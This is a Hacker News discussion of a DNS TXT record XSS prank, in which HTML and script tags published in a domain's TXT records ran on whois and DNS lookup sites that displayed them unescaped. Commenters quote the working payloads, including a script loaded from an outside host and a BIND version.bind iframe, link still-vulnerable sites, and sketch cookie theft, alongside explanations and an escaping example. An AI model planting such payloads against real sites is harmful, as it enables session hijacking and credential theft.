
TXT Record XSS - ryanskidmore
http://who.is/dns/jamiehankins.co.uk
======
mrb
I am half serious, but how about making HTML served in TXT records a standard
trick for serving small web pages very quickly? There are way fewer network
round trips:

    1. DNS query for TXT record for example.com
    2. DNS reply with HTML content

Compared with the traditional 7 steps:

    1. DNS query for A record for example.com
    2. DNS reply with x.x.x.x
    3. TCP SYN to port 80
    4. TCP SYN/ACK
    5. TCP ACK
    6. HTTP GET
    7. HTTP reply with HTML content

It would also make the content super-distributed, super-reliable, as DNS
servers cache it worldwide (and for free so it would reduce hosting costs :D).
Also TXT records can contain more than 255 bytes as long as they are split on
multiple strings of 255 bytes in a DNS reply.

Again, I am only half serious, but this is an interesting thought
experiment...

Edit: oddtarball: DNSSEC would solve spoofing. And updates should take no
longer than the DNS TTL to propagate: the TTL is under your control; you could
set it to 60 seconds if you wanted. It is a common, false misconception that
_many_ DNS resolvers ignore the TTL. Some large web provider (was it Amazon? I
forget) ran an experiment and demonstrated that across tens or hundreds of
thousands of clients worldwide, 99% of them saw DNS updates propagated within
X seconds if the TTL was set to X seconds. Only <1% of DNS resolvers were
ignoring it.

~~~
TeMPOraL
> _I am half serious_

Good. Still, it needs to be pointed out. This idea is an awesome hack to show
how you can piggyback on existing infrastructure to make it work as something
it was not intended to.

But it absolutely, terribly sucks at anything practical. Actually, it's a
_non-solution_. Here's why.

> _There are way fewer network round trips:_

> _1. DNS query for TXT record for example.com_

> _2. DNS reply with HTML content_

Let me show an exactly equivalent alternative implementation of the above
concept.

    1. HTTP GET x.x.x.x/example
    2. HTTP reply with HTML content

Both of them require you to do exactly the same steps - that is, connect to a
_hardcoded port_ of a server at a _hardcoded IP address_ , request a _user-
defined_ resource, receive and display reply. DNS is not magic, IP addresses
of DNS servers are hardcoded in your network configuration and/or in your
router configuration and/or in your ISP configuration.

I know you're half-serious with this idea, but I'm going to play along. So to
continue with the interesting thought experiment... if people were to start
actually using DNS records to smuggle websites, they'd quickly overwhelm the
capabilities of the DNS network, so the reliability and free hosting would
quickly go out of the window, along with all hope of ever having anything even
resembling consistency in the Internet.

So yeah; a nice hack, but kids, don't try to deploy it at scale ;).

~~~
paulfurtado
> _Both of them require you to do exactly the same steps - that is, connect to
> a hardcoded port of a server at a hardcoded IP address, request a user-
> defined resource, receive and display reply. DNS is not magic, IP addresses
> of DNS servers are hardcoded in your network configuration and /or in your
> router configuration and/or in your ISP configuration._

The steps are not _exactly_ the same. Any sensible ISP gives you at least two
redundant DNS servers with your DHCP response and most public DNS providers
also give you multiple redundant servers. When you do a DNS lookup, your OS or
browser handles failover between the DNS servers automatically, client side.
When accessed by IP address, as you've demonstrated, HTTP offers no client-
side failover mechanism built into web browsers to fall back to a different
IP.

It's additionally important to note that architecturally, DNS servers are far
more scalable than most HTTP servers. They don't run anywhere near as much
code per request and don't require the overhead of TCP or HTTP.

Note that I'm also not encouraging using DNS instead of HTTP for serving
websites, I'm just pointing out that DNS is a more reliable technology and has
client-side failover mechanisms so the pros which mrb listed are very real.

------
JamieH
So uh. This works on a few websites. A couple I've found:

[http://dig.whois.com.au/dig.php?dom=jamiehankins.co.uk&type=...](http://dig.whois.com.au/dig.php?dom=jamiehankins.co.uk&type=ALL&submit=Dig+Lookup)

[http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins....](http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins.co.uk&run=toolpage)

~~~
giancarlostoro
I'm guessing nobody else noticed the Rick Roll in there too?

~~~
BuildTheRobots
As the script was just bouncing the search box at the start I a) assumed it
was deliberate and b) expected them to start trying to sell me domains.

The rickroll was the first bit I noticed o_0

------
kazinator
Since there is very little discussion in the link, pardon me for stating what
may be obvious to some, but not necessarily everyone.

The point here is that:

1. DNS TXT records can contain HTML, including scripts and whatever.

2. Domain registrants can publish arbitrary TXT records.

3. TXT records can appear in pages generated by web sites which serve, for
instance, as portals for viewing domain registration information, including
DNS records such as TXT records.

4. Thus, such sites are vulnerable to perpetrating cross-site-script attacks
(XSS) on their visitors if they naively paste the TXT record contents into the
surrounding HTML.

5. The victim is the user who executes a query which finds the malicious
domain which serves up the malicious TXT record that is interpolated into the
displayed results. The user's browser executes the malicious code.

Thus, when you are generating UI markup from pieces, do not trust any data
that is pulled from any third-party untrusted sources, including seemingly
harmless TXT records.
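The lookup-portal flow kazinator describes, as an added Python example (not code from who.is or any other site named in the thread): it parses dig-style TXT answers from a constructed sample, including a record split across several quoted strings and one using RFC 1035 backslash escapes, then renders the results table both the naive way and with entity encoding. `example.test` and `example.invalid` are placeholders.

```python
"""Render DNS TXT records into an HTML results table, vulnerably and safely.

Added example for this thread, not code from any DNS lookup site. The sample
answers below are constructed in the shape of dig's TXT output; example.invalid
is a placeholder host, not a real script source.
"""
import html
import re

# Constructed sample, same shape as the dig output quoted in the thread.
SAMPLE_DIG_OUTPUT = r'''
example.test.   33  IN  TXT "<script src='//example.invalid/x.js'></script>"
example.test.   33  IN  TXT "v=spf1 include:spf.example.net ?all"
example.test.   33  IN  TXT "first 255-byte string, " "second string of the same record"
example.test.   33  IN  TXT "escaped \"quote\", backslash \\ and decimal \065"
'''

TXT_LINE = re.compile(r'^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+TXT\s+(?P<rdata>.*)$')
QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')   # one <character-string> in presentation form
ESCAPE = re.compile(r'\\(\d{3}|.)')            # \DDD decimal escape or \X literal (RFC 1035 s5.1)


def unescape(s: str) -> str:
    """Undo zone-file escaping inside one quoted TXT string."""
    def repl(m: re.Match) -> str:
        tok = m.group(1)
        return chr(int(tok)) if len(tok) == 3 and tok.isdigit() else tok
    return ESCAPE.sub(repl, s)


def parse_txt_answers(text: str) -> list[tuple[str, int, str]]:
    """Return (owner, ttl, txt) per answer line. Rdata longer than 255 bytes
    arrives as several quoted strings; they are concatenated as a client would."""
    records = []
    for line in text.splitlines():
        m = TXT_LINE.match(line)
        if m:
            strings = [unescape(s) for s in QUOTED.findall(m.group('rdata'))]
            records.append((m.group('name'), int(m.group('ttl')), ''.join(strings)))
    return records


def render_vulnerable(records) -> str:
    """What the affected sites did: record text pasted straight into the page, so a
    TXT record containing <script> becomes live markup in the visitor's browser."""
    rows = [f"<tr><td>{name}</td><td>{ttl}</td><td>{txt}</td></tr>"
            for name, ttl, txt in records]
    return "<table>" + "".join(rows) + "</table>"


def render_safe(records) -> str:
    """Same table with every third-party string entity-encoded before interpolation."""
    rows = [f"<tr><td>{html.escape(name)}</td><td>{ttl}</td><td>{html.escape(txt)}</td></tr>"
            for name, ttl, txt in records]
    return "<table>" + "".join(rows) + "</table>"


def has_live_tag(markup: str, tag: str) -> bool:
    """Crude demo check: does a real opening <tag appear in the rendered output?"""
    return re.search(rf"<{tag}\b", markup, re.IGNORECASE) is not None


if __name__ == "__main__":
    recs = parse_txt_answers(SAMPLE_DIG_OUTPUT)
    print("naive page has live <script>:  ", has_live_tag(render_vulnerable(recs), "script"))
    print("escaped page has live <script>:", has_live_tag(render_safe(recs), "script"))
```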

~~~
nhstanley
Thanks for explaining. I know HN is traditionally programmer/programming
focused, but some of us come from other areas and only have limited experience
with such topics. It's very common for me to enter a thread about a security
vulnerability, for example, and think "wait, how big of a deal is this?"

------
ryan-c
I enumerated all IPv4 PTR records a few years back, and I saw a couple XSS
things there as well. If anyone wants to host that data set somewhere, let me
know, would be interesting to see what others do with it.

Edit: I found my data and have a grep running on it, will share what turns up.

Edit2: Somewhat less exciting than I remember:

    $ fgrep -- '>' *
    x.x.101.130.csv:1298607746,155.92.101.130,<hostname>.nebula.msoe.edu.
    x.x.110.35.csv:1298587462,41.191.110.35,www.ahnigeria.org\032<http://www.ahnigeria.org/>.
    x.x.126.67.csv:1298594206,75.127.126.67,\032>.
    x.x.229.74.csv:1298608599,139.78.229.74,<hostname>.suites.osuit.edu.
    x.x.39.239.csv:1298594005,129.89.39.239,<hostname>.uits.uwm.edu.
    x.x.49.198.csv:1298613894,195.164.49.198,test.str!\@#\$%^&*\\(\\)}{\":]['><.,end.domain.test.pl.
    x.x.49.199.csv:1298613720,195.164.49.199,test.str<hr><br>end.domain.test.pl.
    x.x.49.206.csv:1298603066,195.164.49.206,test.str<hr><bR>omain.test.pl.
    x.x.88.109.csv:1298606801,95.211.88.109,ilo.>.88.211.95.in-addr.arpa.

~~~
finnn
How big is it? If you put up a torrent I'll seed it...

~~~
jonknee
Likewise, I have a gigabit internet connection and plenty of extra space.

------
philip1209
I added FartScroll.js from the Onion to my text records:

[http://dig.whois.com.au/dig.php?dom=philipithomas.com&type=A...](http://dig.whois.com.au/dig.php?dom=philipithomas.com&type=ALL&submit=Dig+Lookup)

~~~
elwell
Wow, I think they fixed that escaping problem a few minutes ago.

~~~
philip1209
I think some of the sites escape semicolons only. Pure script loading isn't
broken, but trying to code in the txt may break.

~~~
elwell
But I tried your link recently and it no longer works.

~~~
philip1209
Oh you're correct - they did update it. It still works on a few other sites.

------
SEJeff
From any Linux (or probably OS X) workstation / server, you can run the
command "host -t TXT jamiehankins.co.uk", i.e.:

    $ host -t TXT jamiehankins.co.uk
    ;; Truncated, retrying in TCP mode.
    jamiehankins.co.uk descriptive text "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"
    jamiehankins.co.uk descriptive text "v=spf1 include:spf.mandrillapp.com ?all"
    jamiehankins.co.uk descriptive text "<script src='//peniscorp.com/topkek.js'></script>"
    jamiehankins.co.uk descriptive text "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"

~~~
pkinsky
This is hilarious, but what's up with this line?

> jamiehankins.co.uk descriptive text "v=spf1 include:spf.mandrillapp.com ?all"

Why is mandrillapp.com (transactional email startup) included?

~~~
JamieH
It's my personal domain, I use mandrill for some stuff.

~~~
SEJeff
Hell of a good prank dude, well played sir!

------
kehrlann
This is hilarious, but could this potentially be a real threat to anything?

~~~
bsamuels
idk why you're getting downvoted because it's a good question and people need
to ask more security questions.

Any website I can inject malicious javascript into, I can steal your cookies
from (assuming the httponly flag isn't set on the cookie).

If you were logged into one of these whois sites and they didn't have the
httponly flag set on your auth cookie, an attacker could send you to a page on
the site that contains malicious javascript that could phone home with your
auth cookie, letting the attacker hijack your session.

You can defend your own websites from these kinds of attacks by setting up a
Content Security Policy and using the 'httponly' flag on auth cookies.

[http://en.wikipedia.org/wiki/Content_Security_Policy](http://en.wikipedia.org/wiki/Content_Security_Policy)

~~~
lifeformed
Another attack is to rewrite the webpage to show the official login screen for
that site, and record their password when they enter it.

------
AsakiIssa
Wasn't expecting that at all! Had several tabs opened and was really confused
for a few seconds while I tried to find the tab with 'youtube on autoplay'.

Firefox needs to show the 'play' icon for the audio tag.

~~~
vlunkr
For what it's worth, Chrome tells you which tab audio is playing from, it's
nice.

~~~
pipeep
I think Chrome is able to do this because it separates tabs into processes,
but I don't think there's a good way for Firefox to do it since everything is
in a single process.

[https://bugzilla.mozilla.org/show_bug.cgi?id=486262](https://bugzilla.mozilla.org/show_bug.cgi?id=486262)

~~~
general_failure
I don't think this has to do with multiprocess. The instance of the HTML engine
(Gecko?) just needs to track who used the audio API.

~~~
cryptoz
I think the problem with that is it doesn't work with Flash audio. With
multiprocess browsers, the Flash audio can be associated with a tab, but
that's awkward/not possible if everything is in the same process.

~~~
path411
Chrome didn't have this feature for a very long time, and if anything sounded
like it was actually harder because of how Chrome handles their processes.

------
ryanskidmore
Who.is have fixed it now, but you can still see it in action over at
archive.org

[https://web.archive.org/web/20140918191824/http://who.is/dns...](https://web.archive.org/web/20140918191824/http://who.is/dns/jamiehankins.co.uk)

~~~
tacotime
oh my god, it's even more entertaining with the wayback machine's page header.

------
garazy
I've found about 80 TXT records with <script tags in them - most of them look
like the person not understanding where to paste a JavaScript snippet over XSS
attempts, here's all of them -

[http://builtwith.com/script-tags-in-TXT-records.txt](http://builtwith.com/script-tags-in-TXT-records.txt)

There's a few that are "13h.be/x.js" that look like someone trying this out
before.

------
jedberg
Come on people, this is so basic. If you didn't generate the data, don't
display it on your web page without filtering it. It blows my mind that this
isn't just everyone's default.

~~~
homakov
Yeah, nothing clever at all. Tons of ways for user input, and this one is just
yet another one.

------
colinbartlett
Bravo, I just embarrassed myself in a very quiet meeting.

------
rbinv
Clever. I didn't get it at first.

Never trust user input.

Edit: See
[http://www.dnswatch.info/dns/dnslookup?la=en&host=jamiehanki...](http://www.dnswatch.info/dns/dnslookup?la=en&host=jamiehankins.co.uk&type=TXT&submit=Resolve)
for the actual code.

~~~
dspillett
_> Never trust user input._

Never trust _any_ input. I think this is a case where people assume that it
isn't pure user input because it would have already been
parsed/checked/verified.

"Oh, it's in the DNS system so it must be safe" is worse than "well, it came
from our database so it should be fine". Don't even trust something coming out
of your own database. You never know what various input checking bugs might
have accidentally let in over time.

~~~
arenaninja
This is only too true! At work we do CRUD projects, which means user input
gets stored in the database. I almost always break other people's work by
adding HTML tags to the inputs, navigating back to the page, and seeing markup
that shouldn't be there. Even database output needs to be sanitized.

~~~
peterwwillis
Database output is application input. All forms of input need to be sanitized,
period.

------
toddgardner
The most clever exploit of XSS I've ever seen. Beautiful. Bravo.

------
JamieH
Still working here if anyone is yet to see it.

[http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins....](http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins.co.uk&run=toolpage)

------
Sanddancer
Given how many whois sites cache results, I wonder how many of them are also
vulnerable to SQL injections...

------
elwell
In playing around with this hack, I discovered that Dreamhost doesn't properly
escape TXT records in their admin interface when modifying DNS records. I put
an iframe in and it shows the box but the src is removed; it also killed the
page at that point so I'm unable to remove it...

~~~
Sanddancer
Add the domain to your hosts file to make it not resolve, that should fix it.

~~~
elwell
"the page" referred to Dreamhost's admin page

------
mike-cardwell
A while ago I experimented with adding stuff to the version.bind field in
bind. Just updated it:

    mike@glue:~$ dig +short chaos txt version.bind @198.211.125.252
    "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1' frameborder='0' allowfullscreen></iframe>"

I put this in my named.conf:

    version "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1' frameborder='0' allowfullscreen></iframe>";

This site is vulnerable:

[http://dnscheck.pingdom.com/?domain=grepular.com](http://dnscheck.pingdom.com/?domain=grepular.com)

Although it takes a minute before it kicks in. I did report it to them at the
time, but never got a response.

------
bwy
Wish there was a warning, because I accidentally clicked this link in class
just now.

~~~
iLoch
Don't browse with your volume turned up? How do you assume you won't be
interacting with any pages that may produce noise?

------
0x0
Can it be done with CNAME and SRV records too?

------
homakov
XSS on a shitty website not doing trivial sanitization gets 900 points on HN,
oh guys you are disappointing me so much.

------
Thaxll
It has nothing to do with TXT records, it's just the website that renders
HTML. It could be any source.

~~~
jonknee
It has everything to do with the TXT record... Every XSS could be summed up
with "just the website that renders HTML", but that's pretty much the point.
TXT records aren't often thought of as input and as you can see several sites
made that mistake of assumption.

------
gsharma
Not sure how Trulia handles input for its usernames, but at one point I was
able to do this
[http://www.trulia.com/profile/-iframe--home-buyer-loleta-ca-...](http://www.trulia.com/profile/-iframe--home-buyer-loleta-ca-2860517)

------
sidcool
I opened this link on my Android's Chrome browser. The top search text input
started wildly convulsing. First I thought the post was about that. But I
didn't really get what this is about.

~~~
ccorcos
i don't really get it either

------
sanqui
Looks like the who.is site has patched the exploit up a few minutes ago.

~~~
kk3399
yes, but not fixed here yet -
[http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins....](http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins.co.uk&run=toolpage)

------
js2
All editors should, upon save, put up the following prompt:

"I acknowledge the code just written does not trust its input, under penalty
of being whipped by a wet noodle."

But I guess folks would just click through.

Sigh.

------
gcr
Warning: this page links to (loud!) automatic playing audio.

------
tekknolagi
This is hysterical.

------
indielol
Wouldn't this make it super easy for Google to ban (show the security warnings
in Chrome) the domains?

------
nerdy
Best POC ever.

------
_RPM
When I went to the page, it started playing music. I find that very
frustrating and annoying.

~~~
wittrock
That's the point--who.is won't play music by itself. Its lookup of the DNS
records of jamiehankins.co.uk injected the music into the page.

~~~
_RPM
Oh I see. This makes sense. This doesn't seem challenging to prevent. A simple
replacement of characters on the HTML entity table would have prevented this
instead of putting arbitrary text onto standard output.

~~~
finnn
Correct. The purpose of this post is to demonstrate yet another class of
website that does not validate user input.

------
bdpuk
I've seen similar examples with HTTP headers and sites that display those,
nice angle.

------
general_failure
Well played sir, very well played

------
thomasfl
Finally somebody found a way to put HTML injection to good use.

------
wqfeng
Could anyone tell me what this is about? I just see a DNS page.

~~~
grimtrigger
It was fixed. But if you ctrl+f "peniscorp" you'll see a script that was
injected on the page.

------
ginvok
Aaaand now I'm deaf :) Gotta learn sign language

------
iamwil
How does this work?

~~~
er0k
    jamiehankins.co.uk.	33	IN	TXT	"<script src='//peniscorp.com/topkek.js'></script>"
    jamiehankins.co.uk.	33	IN	TXT	"<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"

------
tedchs
FYI it looks like who.is fixed the XSS bug.

------
ing33k
good hack but really stupid of me to click it directly :\

------
PaulSec
I wonder how this got so many points.. Reflected XSS in 2014, yeah..

------
himanshuy
What's up with the search box?

~~~
MiguelHudnandez
That is from topkek.js. Pretty clever! It plays the harlem shake song. One
element shakes by itself until the second phase of the song, then lots of
other elements start shaking.

Cleverness aside, it is practical when looking for XSS vulnerabilities because
it's _very obvious_ when you've succeeded in injecting your code.

------
zobzu
That made me laugh, good one :)

------
notastartup
man...I woke up and got a dose of surprise....love this song.

------
r0m4n0
isn't this technically illegal to demonstrate haha?

~~~
__david__
Why on earth would it be illegal?

~~~
r0m4n0
damn, that got downvoted into oblivion haha. honest question...

although I don't believe it should be, a third party injecting javascript to
demonstrate an exploit might be...

~~~
maaaats
He hasn't injected anything. It's just his public DNS record that this page
has chosen to display without sanitizing.

~~~
pbhjpbhj
I imagine the UK Computer Misuse Act (e.g. at Section 3,
[http://www.legislation.gov.uk/ukpga/1990/18](http://www.legislation.gov.uk/ukpga/1990/18))
probably covers it if the person who altered the TXT field does so to cause
websites to load code on purpose, that purpose being for example to impair
(Section 3(2)(a)) the running of the computer [causing Rick Astley to play,
defo counts!] - but it can be read to cover pretty much anything.

Similarly I imagine something like the CFAA (18 USC 1030) probably has broad
enough clauses to make this sort of action technically illegal, at least in
some cases? But I'm out of my depth on that one.

~~~
r0m4n0
at least the UK has something somewhat specific (and actually fits XSS quite
well).

CA 502c just says: "(3) Knowingly and without permission uses or causes to be
used computer services" amongst other very broad subsections

[http://support.piercecollege.edu/1521a/References/California...](http://support.piercecollege.edu/1521a/References/California%20Penal%20Code%20Computer%20Crimes%20Section%20502.aspx)

------
st3fan
Wonderful!

------
sprkyco
Luckily it does not work on my normal browser:
[https://www.whitehatsec.com/aviator/](https://www.whitehatsec.com/aviator/)

